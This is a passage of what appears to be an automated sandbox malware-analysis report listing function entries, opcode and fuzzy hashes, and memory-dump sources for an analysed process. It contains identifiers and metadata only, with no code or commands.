                                                                                                            • Opcode Fuzzy Hash: 36f0681bf97f5a808adc5eb8b35eb3135534e4ad98e682c20eff3377c3047065
                                                                                                            • Instruction Fuzzy Hash: CC5111B4D05608CFDB14CFA9D484ADDBBB1FF89310F20892AE425BB2A4D7759886CF10
                                                                                                            Function 001DE133 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1338 1de133 1339 1de1f2-1de203 1338->1339 1340 1de20a-1de213 1339->1340 1341 1de205 1339->1341 1343 1de219-1de22c 1340->1343 1344 1ddfeb-1de010 1340->1344 1341->1340 1345 1de22e 1343->1345 1346 1de233-1de24e 1343->1346 1347 1de017-1de04d 1344->1347 1348 1de012 1344->1348 1345->1346 1349 1de255-1de269 1346->1349 1350 1de250 1346->1350 1356 1de04f 1347->1356 1357 1de054-1de086 1347->1357 1348->1347 1354 1de26b 1349->1354 1355 1de270-1de286 LdrInitializeThunk 1349->1355 1350->1349 1354->1355 1358 1de288-1de384 1355->1358 1356->1357 1363 1de088-1de0ad 1357->1363 1364 1de0ea-1de0fd 1357->1364 1361 1de38c-1de396 1358->1361 1362 1de386-1de38b 1358->1362 1362->1361 1365 1de0af 1363->1365 1366 1de0b4-1de0e2 1363->1366 1367 1de0ff 1364->1367 1368 1de104-1de129 1364->1368 1365->1366 1366->1364 1367->1368 1372 1de138-1de170 1368->1372 1373 1de12b-1de12c 1368->1373 1374 1de177-1de1d8 1372->1374 1375 1de172 1372->1375 1373->1343 1380 1de1df-1de1f1 1374->1380 1381 1de1da 1374->1381 1375->1374 1380->1339 1381->1380
                                                                                                            APIs
                                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 001DE275
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907954251.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_1d0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 449fa464f30057fda65ed4d553cfc32f626bae0a81ca661c39434efde0844086
                                                                                                            • Instruction ID: 23933017d3ec1bc2a69f91400d7b8f11dee1ee2e99e4803f1c3743ce6a7a9329
                                                                                                            • Opcode Fuzzy Hash: 449fa464f30057fda65ed4d553cfc32f626bae0a81ca661c39434efde0844086
                                                                                                            • Instruction Fuzzy Hash: 6C117274E002189FDB04DFA8C9C4AADB7F9FB88306F548516E405EB341D730E941CB10
                                                                                                            Function 00543E68 Relevance: .2, Instructions: 171COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908246663.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_540000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2ef3bac982da9e6ba6d9a7740f6da5067e48d62168ffb9a1b49607eebb63d1b0
                                                                                                            • Instruction ID: 6830b04333806e33e4459c1f9d40b8b3594d7948dc5aad1ab32dacac5e27d1b8
                                                                                                            • Opcode Fuzzy Hash: 2ef3bac982da9e6ba6d9a7740f6da5067e48d62168ffb9a1b49607eebb63d1b0
                                                                                                            • Instruction Fuzzy Hash: 9271B174E00218CFDB18DFA5D994AEDBBB2FF89304F24852AD409AB359DB356942CF50
                                                                                                            Function 003A9320 Relevance: .2, Instructions: 171COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908085019.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_3a0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 50687b7e5aa212eeff6e27cf392667dee738923ca9fb91e7a657f15478c2a984
                                                                                                            • Instruction ID: 14c69ae2d543386f65cf416f755b0d759bcff777dbfa8b98504e30065bcb9297
                                                                                                            • Opcode Fuzzy Hash: 50687b7e5aa212eeff6e27cf392667dee738923ca9fb91e7a657f15478c2a984
                                                                                                            • Instruction Fuzzy Hash: C871C074E002188FDB14DFA6C995AADBBB2FF89300F24842AD405AB358DB35A942CF50
                                                                                                            Function 003A9FC8 Relevance: .2, Instructions: 171COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908085019.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_3a0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48c33d5d535051c91635718c52c703bf6f080a940efec5cc0b6060d923d47734
                                                                                                            • Instruction ID: 11c6cab7347edfbd498d569e728322c95660e347a1b8954ebcffbba3e574c9f1
                                                                                                            • Opcode Fuzzy Hash: 48c33d5d535051c91635718c52c703bf6f080a940efec5cc0b6060d923d47734
                                                                                                            • Instruction Fuzzy Hash: 1271C274E00218CFDB18DFA5D994BADBBB2FF89300F24852AD415AB359DB35A942CF50
                                                                                                            Function 00651BC0 Relevance: .1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 34dbf8c11e6a44bf6259d2b16365bfe69aec5de1055a2e8a27c349bd6f7d16f0
                                                                                                            • Instruction ID: b4f562ce74973877a9f3ff9482563ff260e010e56120ed5d110d1ea79b6d4594
                                                                                                            • Opcode Fuzzy Hash: 34dbf8c11e6a44bf6259d2b16365bfe69aec5de1055a2e8a27c349bd6f7d16f0
                                                                                                            • Instruction Fuzzy Hash: FB41C174D00248CFDB14DFA5D594BEDBBF2BF89301F24812AE805AB294DB74694ACF50
                                                                                                            Function 00651BD0 Relevance: .1, Instructions: 111COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908298387.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_650000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9fb59a8fe37fee0a3df13dfb2eb63d25cbe326eab94cf352d2f34c86bf873338
                                                                                                            • Instruction ID: cf1249ab0f733c18d5b69e62e935dfb8bd7cd93c0a793b267538fced3d2d5d54
                                                                                                            • Opcode Fuzzy Hash: 9fb59a8fe37fee0a3df13dfb2eb63d25cbe326eab94cf352d2f34c86bf873338
                                                                                                            • Instruction Fuzzy Hash: C741AE74D00208CFDB14DFA5D5947EDBBF2BF89301F24812AE815AB2A4EB74694ACF50
                                                                                                            Function 0054A112 Relevance: .1, Instructions: 95COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.908246663.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_540000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 39142e90441c0ed8a8582bcc9267e148e42db79c88f1f229dc9a01847191314e
                                                                                                            • Instruction ID: 24bf80d4b8112f4946499cf48eccb36e541984ee37944e5a3d99bd197f58a1e5
                                                                                                            • Opcode Fuzzy Hash: 39142e90441c0ed8a8582bcc9267e148e42db79c88f1f229dc9a01847191314e
                                                                                                            • Instruction Fuzzy Hash: 2F31EF74E006088FDB48DFAAD8546EEBBF2BFC9300F10D02AD419AB254EB745942CF51
                                                                                                            Function 0017D006 Relevance: .1, Instructions: 84COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907864038.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_17d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c460f6e08ed4ea1825736fcb497e392bb9a6b5a8b35c47164a4767725e5a0509
                                                                                                            • Instruction ID: ad707caeb4de8499d0e57402ee9891c359605657d90dc21818a62ffa0c6b771b
                                                                                                            • Opcode Fuzzy Hash: c460f6e08ed4ea1825736fcb497e392bb9a6b5a8b35c47164a4767725e5a0509
                                                                                                            • Instruction Fuzzy Hash: AB31387550E3C49FD7038B20D8A4711BF71AF47214F29C5DBD889CF2A3C22A984ACB62
                                                                                                            Function 0016D554 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907839877.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_16d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6cb891172a20b59a3664c81526394bca31c3cb1a7295d74f22c1136e78fa017b
                                                                                                            • Instruction ID: cb1e8879cd60a071f06ef6c71cf3a956dc0656a2219708eff0ac87a8be3fc754
                                                                                                            • Opcode Fuzzy Hash: 6cb891172a20b59a3664c81526394bca31c3cb1a7295d74f22c1136e78fa017b
                                                                                                            • Instruction Fuzzy Hash: E121D375A04340DFEB15DF14EDC0B26BF75EB88314F24C569E80A4B646C336D866CBA2
                                                                                                            Function 0017D044 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907864038.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_17d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d5b800ebdb38dcab67f5230d0b28b360615239fa58a76d3dda5a1f094231944
                                                                                                            • Instruction ID: fcc9b79420a972e3ce1854c25dac3a61d45a7b156cf38c9e70a46ca5e1acfa6c
                                                                                                            • Opcode Fuzzy Hash: 8d5b800ebdb38dcab67f5230d0b28b360615239fa58a76d3dda5a1f094231944
                                                                                                            • Instruction Fuzzy Hash: 8221AF75604348DFEB14CF24E884B26BB75EF84314F34C6A9E84D4B242C736D846CA62
                                                                                                            Function 0016D54F Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.907839877.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_16d000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9db876a194b11add3b8ed59ab83e46afef4b80a3836825e6e29e07944ab82751
                                                                                                            • Instruction ID: 009ead8a324ca68922f92c929074c037a506843c24f125e6e879cb035bb6432d
                                                                                                            • Opcode Fuzzy Hash: 9db876a194b11add3b8ed59ab83e46afef4b80a3836825e6e29e07944ab82751
                                                                                                            • Instruction Fuzzy Hash: 0E11D376904280CFDB11CF14E9C4B16BF71FB94314F24C5A9D8094B656C336D86ACFA2